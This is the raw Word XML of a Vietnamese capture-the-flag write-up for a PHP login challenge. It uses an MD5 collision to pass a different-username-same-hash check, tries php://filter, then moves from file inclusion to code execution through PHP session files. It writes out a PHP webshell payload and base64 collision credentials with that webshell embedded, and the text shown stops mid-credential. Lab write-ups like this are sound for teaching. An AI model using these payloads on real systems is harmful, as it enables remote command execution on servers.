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AE847A" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRPr="00A56D84" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56D84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 5: Magic Login Harder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CF93C" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2192667D" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRDefault="00F70C76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đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08728E46" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC8C422" w14:textId="3F5552B0" w:rsidR="00F70C76" w:rsidRDefault="00F70C76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36E553" wp14:editId="3608875B">
            <wp:extent cx="4354705" cy="2974693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198" cy="298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1EEA6" w14:textId="1622635D" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404AA31A" w14:textId="1FC6987F" w:rsidR="00F70C76" w:rsidRDefault="00F70C76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Yêu cầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4FF4E" w14:textId="5B0604C1" w:rsidR="00F70C76" w:rsidRPr="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C7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F70C76">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username và password khác nhau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ABE49E" w14:textId="24354598" w:rsidR="00F70C76" w:rsidRPr="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76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F70C76">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hash md5 của username và password bằng nhau </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB9403" w14:textId="17177ED3" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70C7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Truy cập được trang admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B691F51" w14:textId="0AE36F40" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522F9170" w14:textId="72565A83" w:rsidR="00F70C76" w:rsidRDefault="00F70C76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Ý tưởng là mình sẽ dùng md5 collision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB3C09" w14:textId="769B2D90" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F02E34" w14:textId="77E66928" w:rsidR="00172A5B" w:rsidRPr="00172A5B" w:rsidRDefault="00172A5B" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988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Cách tạo md5 collision: </w:t>
      </w:r>
      <w:r w:rsidRPr="00172A5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://gist.github.com/erikdubbelboer/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783FE09F" w14:textId="5D5D0995" w:rsidR="00172A5B" w:rsidRDefault="00172A5B" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172A5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2a4d2a8bd56e897805a599cdb91772b2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55458241" w14:textId="77777777" w:rsidR="00172A5B" w:rsidRDefault="00172A5B" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C16DE0" w14:textId="4A6CF07B" w:rsidR="00172A5B" w:rsidRDefault="00172A5B" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988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phải tạo 1 username và password được mã hóa base64.</w:t>
      </w:r>
      <w:r w:rsidR="00911274">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đơn giản nên mình sẽ bỏ qua.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50528B07" w14:textId="09AC7E69" w:rsidR="00911274" w:rsidRDefault="00911274" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397A4714" w14:textId="059A2700" w:rsidR="00911274" w:rsidRPr="00911274" w:rsidRDefault="00911274" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00911274">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">username:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00911274">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0THdAsXm7sRpPZoGmK/5XC/KtYcSRn6rQARYPrj7f4lVrTQGCfSzAoPkiIMlcUFaCFEl6PfNyZ/ZHb3ygDc8W9iCPjFWNI9brm2s1DbJGcbdU+K0h9oD/QI5YwbSSM2g6Z8zQg9XfujOVLZwgKgNHsaYIby2qIOTlvllK2/3KnA=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6DB8F" w14:textId="1EB1A50A" w:rsidR="00911274" w:rsidRPr="00911274" w:rsidRDefault="00911274" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20152AEE" w14:textId="77777777" w:rsidR="00911274" w:rsidRPr="00911274" w:rsidRDefault="00911274" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF7825B" w14:textId="7CA51768" w:rsidR="00911274" w:rsidRPr="00911274" w:rsidRDefault="00911274" w:rsidP="00172A5B">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00911274">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C708542" w14:textId="7AD4BB69" w:rsidR="00F70C76" w:rsidRPr="00911274" w:rsidRDefault="00911274" w:rsidP="00911274">
      <w:pPr>
        <w:ind w:right="-988"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00911274">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0THdAsXm7sRpPZoGmK/5XC/KtQcSRn6rQARYPrj7f4lVrTQGCfSzAoPkiIMl8UFaCFEl6PfNyZ/ZHb1ygDc8W9iCPjFWNI9brm2s1DbJGcbdU+I0h9oD/QI5YwbSSM2g6Z8zQg9XfujOVLZwgCgNHsaYIby2qIOTlvllq2/3KnA=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1928BE" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023CB314" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRDefault="00F70C76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admin: cho phép bạn đọc file. Nhưng bạn không biết tên flag (flag ngẫu nhiên)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAEC6A0" w14:textId="77777777" w:rsidR="00F70C76" w:rsidRDefault="00F70C76" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6506E974" w14:textId="4E269D09" w:rsidR="00F70C76" w:rsidRDefault="00F70C76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03D7E9C" wp14:editId="522EE443">
            <wp:extent cx="4902200" cy="3035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3FB5" w14:textId="0C8FC9A4" w:rsidR="00911274" w:rsidRDefault="00911274" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0337459D" w14:textId="28300746" w:rsidR="00911274" w:rsidRDefault="00911274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93CD70" wp14:editId="4C08B219">
            <wp:extent cx="3552502" cy="1292860"/>
            <wp:effectExtent l="0" t="0" r="381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1" t="7479" r="66504" b="73512"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3582329" cy="1303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7C857" w14:textId="3B7BEAEA" w:rsidR="00F70C76" w:rsidRDefault="00911274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không biết được tên flag. </w:t>
      </w:r>
      <w:r w:rsidR="000C6FDB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử php://filter, đọc được file index.php</w:t>
      </w:r>
      <w:r w:rsidR="00030C9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37701829" w14:textId="625BBEAD" w:rsidR="000C6FDB" w:rsidRDefault="000C6FDB" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AECE42" w14:textId="1BEFD46C" w:rsidR="000C6FDB" w:rsidRDefault="000C6FDB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7D62F3D" wp14:editId="4BFF38E5">
            <wp:extent cx="5081286" cy="1046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4" t="7479" r="40409" b="73197"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5227376" cy="107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4FCAA" w14:textId="65ADD1CA" w:rsidR="00030C9B" w:rsidRDefault="00030C9B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Dùng script phpfilter2rce, mình thay đổi một chút xíu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58562386" w14:textId="7B9DB028" w:rsidR="00030C9B" w:rsidRDefault="00030C9B" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2493E2FA" w14:textId="4DAAF2EC" w:rsidR="0064221E" w:rsidRDefault="0064221E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8135B2" wp14:editId="49F16B37">
            <wp:extent cx="3644900" cy="317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62EB0" w14:textId="77777777" w:rsidR="0064221E" w:rsidRDefault="0064221E" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B78B42" w14:textId="650C5132" w:rsidR="00030C9B" w:rsidRDefault="00030C9B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thêm header cookies mới </w:t>
      </w:r>
      <w:r w:rsidR="0064221E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực thi được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A7543" w14:textId="77777777" w:rsidR="0064221E" w:rsidRDefault="0064221E" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174467F3" w14:textId="31DB1649" w:rsidR="00030C9B" w:rsidRDefault="0064221E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773FED" wp14:editId="6ABD156E">
            <wp:extent cx="5943600" cy="91376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BADF" w14:textId="46F7DA5F" w:rsidR="0064221E" w:rsidRDefault="0064221E" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8154CA" w14:textId="4C7C9A77" w:rsidR="0064221E" w:rsidRDefault="00E33F87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Nhưng báo lỗi: không khởi tạo được filter </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33F87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convert.iconv.UTF16.EUCTW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33F87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convert.iconv.UTF8.CSISO2022KR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,… trên trang admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633EAB7C" w14:textId="76458F3B" w:rsidR="00E33F87" w:rsidRDefault="00E33F87" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6594CCCF" w14:textId="72BE0B94" w:rsidR="00E33F87" w:rsidRPr="00E33F87" w:rsidRDefault="00E33F87" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33F87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LFI2RCE via PHP_Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF2852" w14:textId="494ABFDC" w:rsidR="00E33F87" w:rsidRDefault="00E33F87" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53AF2E51" w14:textId="5A789E51" w:rsidR="00E33F87" w:rsidRDefault="00E6786F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Kiểm tra thấy trang web dùng PHP Session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E7D0A" w14:textId="23EFCCE4" w:rsidR="00E6786F" w:rsidRDefault="00E6786F" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4193FBA7" w14:textId="0D73B109" w:rsidR="00E6786F" w:rsidRDefault="00E6786F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Dùng LFI để include session file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B4D02" w14:textId="0BA61C0C" w:rsidR="00E6786F" w:rsidRDefault="00E6786F" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8EB56C" w14:textId="398971C1" w:rsidR="00E6786F" w:rsidRDefault="00E6786F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4C5A07A" wp14:editId="3C84464B">
            <wp:extent cx="6156056" cy="972274"/>
            <wp:effectExtent l="0" t="0" r="381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4" r="24801" b="73203"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6247885" cy="986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DD007" w14:textId="334CE483" w:rsidR="00E6786F" w:rsidRDefault="00E6786F" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E73F8C" w14:textId="77777777" w:rsidR="00E6786F" w:rsidRDefault="00E6786F" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299FF4D6" w14:textId="1848E768" w:rsidR="00E33F87" w:rsidRDefault="00363CB1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Ở đây nó có hiện trường username, như vậy nếu username=&lt;?php echo system($_GET[</w:t>
      </w:r>
      <w:r w:rsidRPr="00363CB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00363CB1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
      <w:r w:rsidR="00914F5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?&gt; thì sao nhỉ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73904126" w14:textId="5FCD9021" w:rsidR="00E33F87" w:rsidRDefault="00E33F87" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1F1C59" w14:textId="5E9246B5" w:rsidR="00363CB1" w:rsidRDefault="005B4B18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Cái bạn nhìn thấy trong username là</w:t>
      </w:r>
      <w:r w:rsidR="00914F5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> plaintext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAACFF6" w14:textId="42F8F705" w:rsidR="005B4B18" w:rsidRDefault="005B4B18" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64294ECF" w14:textId="6C9A83D3" w:rsidR="005B4B18" w:rsidRPr="00C10C19" w:rsidRDefault="005B4B18" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10C19">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10C19">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'d131dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10C19">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10C19">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10C19">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> | xxd -r -p </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC01BB4" w14:textId="77777777" w:rsidR="00914F5D" w:rsidRDefault="00914F5D" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66428C6F" w14:textId="49604D95" w:rsidR="00030C9B" w:rsidRDefault="00914F5D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FD96D6A" wp14:editId="6E5B8DEA">
            <wp:extent cx="5943600" cy="651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2579" w14:textId="57E34C5A" w:rsidR="00914F5D" w:rsidRDefault="00914F5D" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F4F7C7" w14:textId="79127E1F" w:rsidR="00914F5D" w:rsidRDefault="00914F5D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Thêm webshell vào username và password thì hash md5 sẽ không thay đổi gì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189387D" w14:textId="6A954E81" w:rsidR="00914F5D" w:rsidRDefault="00914F5D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A5BB3A7" wp14:editId="75A49A55">
            <wp:extent cx="5019163" cy="272005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35" t="9353" r="11759" b="48588"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5042305" cy="273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1A238" w14:textId="5CE94C1B" w:rsidR="00FD5433" w:rsidRDefault="00FD5433" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488F4B8A" w14:textId="13031B0D" w:rsidR="00FD5433" w:rsidRDefault="00FD5433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Tạo xong thì phải base64 mới đăng nhập được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7931780B" w14:textId="79D73248" w:rsidR="00FD5433" w:rsidRDefault="00FD5433" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB0F0C3" w14:textId="54D09198" w:rsidR="00FD5433" w:rsidRDefault="00FD5433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6E5F4A" wp14:editId="663D8887">
            <wp:extent cx="5943600" cy="525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23E28" w14:textId="77777777" w:rsidR="00FD5433" w:rsidRDefault="00FD5433" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5562B45B" w14:textId="3E64E4BD" w:rsidR="00FD5433" w:rsidRDefault="00FD5433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username: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7F21D" w14:textId="1DF2BBBE" w:rsidR="00FD5433" w:rsidRPr="00FD5433" w:rsidRDefault="00FD5433" w:rsidP="00F70C76">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5433">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0THdAsXm7sRpPZoGmK/5XC/KtYcSRn6rQARYPrj7f4lVrTQGCfSzAoPkiIMlcUFaCFEl6PfNyZ/ZHb3ygDc8W9iCPjFWNI9brm2s1DbJGcbdU+K0h9oD/QI5YwbSSM2g6Z8zQg9XfujOVLZwgKgNHsaYIby2qIOTlvllK2/3KnA9PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430AE011" w14:textId="1437DEA4" w:rsidR="00FD5433" w:rsidRPr="00FD5433" w:rsidRDefault="00FD5433" w:rsidP="00F70C76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password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5433">
        <w:rPr>
